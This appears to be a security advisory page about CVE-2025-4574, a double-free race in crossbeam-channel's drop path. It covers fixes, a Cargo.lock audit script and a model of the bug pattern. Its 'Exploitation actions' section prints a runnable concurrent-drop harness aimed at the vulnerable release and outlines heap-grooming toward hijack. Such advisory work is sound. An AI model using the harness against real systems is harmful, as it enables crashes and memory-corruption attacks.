crossbeam-channel: double-free race condition in crossbeam-channel Rust crate (CVE-2025-4574) #shorts
Summary
Welcome to today’s security update. We’re discussing CVE-2025-4574, a recently disclosed vulnerability in the crossbeam-channel crate for Rust. First published on May 13, 2025 and updated through May 21, it involves a race condition in the channel drop logic leading to a possible double-free and memory corruption. Fedora 41 has already shipped a fix in the python-watchfiles package, and Red Hat has pushed updates across multiple enterprise products.
Product details
crossbeam-channel is a popular Rust library that provides multi-producer, multi-consumer channels for thread communication. Versions 0.5.12 through 0.5.14 are affected, that is, every release from 0.5.12 up to but not including the fixed 0.5.15. Fedora 41 maintainers updated the python-watchfiles package, which depends indirectly on crossbeam-channel, to pull in the fixed version. Red Hat has similarly issued patches for Directory Server, Enterprise Linux versions 7 through 10, OpenShift Container Platform 4, Satellite 6 and other components.
Vulnerability type summary
This issue is classified as a double-free vulnerability caused by a race condition. In concurrent code, if two threads trigger the channel’s drop logic simultaneously, the same memory region can be freed twice. Double-free bugs can lead to memory corruption, application crashes, and in some cases can be leveraged for arbitrary code execution.
Details of the vulnerability
The flaw resides in the Drop implementation of the internal Channel type. When the last handle to a channel goes away, cleanup code deallocates the shared buffers. Under concurrent teardown, however, two threads can reach that cleanup path at the same time for the same channel object. The cleanup runs in unsafe code that manages the allocation by hand, so the compiler's ownership checks do not stand in the way of a second free, and the buffer is freed twice. The result is undefined behavior: memory may be corrupted, the process may crash (a denial of service), and an attacker who can influence the timing of channel teardown inside a process could potentially turn the corruption into control-flow hijack, although a crash is the most likely outcome.
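The check-then-act pattern behind this class of bug, as an added example written for this page (hypothetical code that models the pattern; it is not crossbeam-channel's own Drop implementation): two handles share one heap buffer and a hand-maintained owner count, the buggy handle decrements and then re-reads the count to decide whether it is the last owner, and the hardened handle decides from the value the atomic decrement returns. Deallocation is replaced by a counter so the double free can be observed instead of crashing the process.

```rust
use std::sync::atomic::{fence, AtomicUsize, Ordering};
use std::sync::Arc;
use std::thread;

/// Stand-in for the channel's heap buffer. Really freeing memory twice is
/// undefined behaviour, so release() only counts how often it was called.
#[derive(Default)]
struct Buffer {
    frees: AtomicUsize,
}

impl Buffer {
    fn release(&self) {
        self.frees.fetch_add(1, Ordering::SeqCst);
    }
    fn free_count(&self) -> usize {
        self.frees.load(Ordering::SeqCst)
    }
}

/// Hypothetical shared state behind every handle to one channel (a model of
/// Sender/Receiver halves sharing one heap-allocated Channel, not crossbeam's
/// real layout): the buffer plus a hand-maintained owner count.
struct Shared {
    owners: AtomicUsize,
    buffer: Arc<Buffer>, // Arc only so callers can read free_count() afterwards
}

impl Shared {
    fn new(owner_count: usize, buffer: Arc<Buffer>) -> Arc<Shared> {
        Arc::new(Shared { owners: AtomicUsize::new(owner_count), buffer })
    }
}

/// BUGGY: decrement, then re-read the counter to decide whether to free.
/// Two handles dropped concurrently can both decrement before either re-reads,
/// both observe 0, and both release the same buffer: a double free.
struct RacyHandle(Arc<Shared>);

impl Drop for RacyHandle {
    fn drop(&mut self) {
        self.0.owners.fetch_sub(1, Ordering::AcqRel);
        if self.0.owners.load(Ordering::Acquire) == 0 {
            self.0.buffer.release();
        }
    }
}

/// FIXED: decide from the value the atomic decrement returns. Exactly one
/// dropper observes the count going from 1 to 0, so exactly one frees.
struct FixedHandle(Arc<Shared>);

impl Drop for FixedHandle {
    fn drop(&mut self) {
        if self.0.owners.fetch_sub(1, Ordering::Release) == 1 {
            fence(Ordering::Acquire); // see the other owners' final writes before freeing
            self.0.buffer.release();
        }
    }
}

/// Replays in one thread, step by step, the interleaving that breaks
/// RacyHandle: both owners decrement, then both check. Returns the free
/// count (2 means the same buffer was freed twice).
fn racy_interleaving_frees() -> usize {
    let buffer = Arc::new(Buffer::default());
    let shared = Shared::new(2, buffer.clone());
    shared.owners.fetch_sub(1, Ordering::AcqRel); // owner A decrements: 2 -> 1
    shared.owners.fetch_sub(1, Ordering::AcqRel); // owner B decrements: 1 -> 0
    if shared.owners.load(Ordering::Acquire) == 0 { shared.buffer.release() } // A frees
    if shared.owners.load(Ordering::Acquire) == 0 { shared.buffer.release() } // B frees again
    buffer.free_count()
}

/// Drops two handles to one buffer from two threads, `rounds` times, and returns
/// the highest free count any single buffer reached (1 is correct, 2 is a double free).
fn worst_free_count<H: Send + 'static>(rounds: usize, make: fn(Arc<Shared>) -> H) -> usize {
    let mut worst = 0;
    for _ in 0..rounds {
        let buffer = Arc::new(Buffer::default());
        let shared = Shared::new(2, buffer.clone());
        let (a, b) = (make(shared.clone()), make(shared.clone()));
        let ta = thread::spawn(move || drop(a));
        let tb = thread::spawn(move || drop(b));
        ta.join().unwrap();
        tb.join().unwrap();
        worst = worst.max(buffer.free_count());
    }
    worst
}

fn racy_worst(rounds: usize) -> usize { worst_free_count(rounds, RacyHandle) }
fn fixed_worst(rounds: usize) -> usize { worst_free_count(rounds, FixedHandle) }

fn main() {
    println!("hand-replayed racy interleaving: {} frees", racy_interleaving_frees());
    println!("racy handles, worst over 2000 rounds: {} frees", racy_worst(2000));
    println!("fixed handles, worst over 2000 rounds: {} frees", fixed_worst(2000));
}
```

racy_interleaving_frees() replays the losing interleaving deterministically, which is how you pin such a bug down once a sanitizer or an allocator abort has pointed at the destructor. The threaded stress loop may report only 1 free for the racy handle even over thousands of rounds, which is exactly why a destructor race of this shape can survive ordinary testing; the fixed handle reports 1 every time because the decision and the decrement are a single atomic operation.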
Conclusion
To remediate, upgrade crossbeam-channel to version 0.5.15 or later. Fedora 41 users should install the updated python-watchfiles package immediately. Red Hat customers should apply the vendor patches for their affected products. Developers of Rust crates and downstream projects should check which crossbeam-channel version their Cargo.lock actually resolves (a Cargo.toml range such as "0.5" says nothing on its own), update the lock and rebuild, since the fix only reaches a Rust binary when that binary is recompiled against the fixed crate. That wraps our coverage of CVE-2025-4574. Thanks for listening, and stay secure.
Watch the full video on YouTube: CVE-2025-4574
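The dependency audit recommended above, as an added example written for this page (not a script from the page or the crossbeam project): it reads a Cargo.lock directly, so it works in CI without cargo installed, and flags any resolved crossbeam-channel version in the 0.5.12 through 0.5.14 range. Only the Cargo.lock entry format is assumed; the sample lockfile at the end is constructed for the demo.

```sh
#!/bin/sh
# Added example: scan a Cargo.lock for crossbeam-channel versions in the
# affected range 0.5.12 through 0.5.14. Assumes only the lockfile format.

# Print every resolved crossbeam-channel version in the lockfile given as $1.
crossbeam_versions() {
    # Cargo.lock entries look like:
    #   [[package]]
    #   name = "crossbeam-channel"
    #   version = "0.5.14"
    awk '
        /^\[\[package\]\]/ { name = "" }
        /^name = /         { gsub(/"/, "", $3); name = $3 }
        /^version = / && name == "crossbeam-channel" { gsub(/"/, "", $3); print $3 }
    ' "$1"
}

# Succeeds (exit 0) when $1 is one of the affected releases.
is_vulnerable() {
    case "$1" in
        0.5.12|0.5.13|0.5.14) return 0 ;;
        *) return 1 ;;
    esac
}

# Report each crossbeam-channel entry in $1; return 1 if any is affected.
check_lock() {
    versions=$(crossbeam_versions "$1")
    if [ -z "$versions" ]; then
        echo "no crossbeam-channel entry in $1"
        return 0
    fi
    status=0
    for v in $versions; do
        if is_vulnerable "$v"; then
            echo "VULNERABLE: crossbeam-channel $v (upgrade to 0.5.15 or later)"
            status=1
        else
            echo "ok: crossbeam-channel $v"
        fi
    done
    return "$status"
}

# Constructed sample lockfile for the demo (not a real project's lock).
sample_lock() {
    cat <<'EOF'
[[package]]
name = "crossbeam-channel"
version = "0.5.14"
source = "registry+https://github.com/rust-lang/crates.io-index"

[[package]]
name = "crossbeam-utils"
version = "0.8.21"
source = "registry+https://github.com/rust-lang/crates.io-index"
EOF
}

# Usage: check_lock path/to/Cargo.lock. demo runs it against the sample above.
demo() {
    tmp=$(mktemp)
    sample_lock > "$tmp"
    check_lock "$tmp"
    rc=$?
    rm -f "$tmp"
    return "$rc"
}

if demo; then echo "lockfile clean"; else echo "lockfile affected"; fi
```

With cargo available, `cargo tree -i crossbeam-channel` shows which dependencies pull the crate in (for python-watchfiles that chain is indirect), and `cargo update -p crossbeam-channel` moves the lock to the newest compatible release; the binary must then be rebuilt for the fix to take effect.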
Remediation and exploitation details
This chain involves the following actors
- Attacker: races the channel's drop path to corrupt memory
- Rust Developer: maintains code that depends on crossbeam-channel
- Fedora 41 User: runs python-watchfiles built against the vulnerable crate
The following systems are involved
- crossbeam-channel (provides thread communication channels): contains the internal Channel type whose Drop implementation is racy
- python-watchfiles (Fedora 41) (monitors file system changes): bundles the vulnerable crossbeam-channel version
- Rust Application (executes user-land code using channels): the host process in which a race-to-free would occur
Attack entry point
- Channel Drop method: a race condition in the destructor of the internal Channel type can free the same memory twice.
Remediation actions
- Upgrade crossbeam-channel to 0.5.15 or later; make sure Cargo.lock resolves to the fixed version (cargo update -p crossbeam-channel) and rebuild, because the crate is compiled into each binary.
- Fedora 41: install the updated python-watchfiles package.
- Red Hat: apply the vendor patches for Directory Server, Enterprise Linux 7 through 10, OpenShift Container Platform 4 and Satellite 6.
- Downstream projects: audit dependency trees (cargo tree -i crossbeam-channel) for the 0.5.12 through 0.5.14 range.
Exploitation actions
The steps below (channel instantiation, controlled drop of the sender, concurrent drop of the receiver, race amplification) are reconstructed into one runnable harness that exercises the concurrent drop path the advisory describes. Because the race is timing-dependent it is not a guaranteed trigger, and no public proof-of-concept is referenced on this page. Build it against an affected release, for example crossbeam-channel = "=0.5.14".

    use crossbeam_channel::unbounded;
    use std::thread;

    fn main() {
        // Race amplification: many rounds, each with two threads dropping one half
        for _ in 0..1_000_000 {
            let (sender, receiver) = unbounded();
            // Controlled drop of the sender after one send; the send may fail
            // if the receiver is already gone, which does not matter here
            let s = thread::spawn(move || {
                let _ = sender.send(42);
                drop(sender);
            });
            // Concurrent drop of the receiver
            let r = thread::spawn(move || {
                drop(receiver);
            });
            s.join().unwrap();
            r.join().unwrap();
        }
    }

Memory corruption observation
- The process aborts in the allocator (glibc prints "free(): double free detected in tcache 2") or crashes later on a corrupted heap; a build with AddressSanitizer (nightly rustc, -Zsanitizer=address) reports the second free at the offending call.
Post-corruption exploitation
- As with any double free, an attacker who can groom the heap could in principle turn the corrupted allocation into an overwrite of a function pointer or trait-object vtable pointer; no exploit chain for this CVE is described here.
Related Content
NOTE: The following related content has not been vetted and may be unsafe.
- https://access.redhat.com/security/cve/CVE-2025-4574
- https://bugzilla.redhat.com/show_bug.cgi?id=2358890
- https://github.com/crossbeam-rs/crossbeam/pull/1187
- [2025-05-23] Fedora 41 releases a security fix for CVE-2025-4574 in python-watchfiles package.
- [2025-06-14] Fedora 41 release includes improvements, fixes, and updates to address CVE-2025-4574.
- [2025-06-14] Fedora 41 release includes improvements, fixes, and updates crossbeam-channel dependency to address CVE-2025-4574.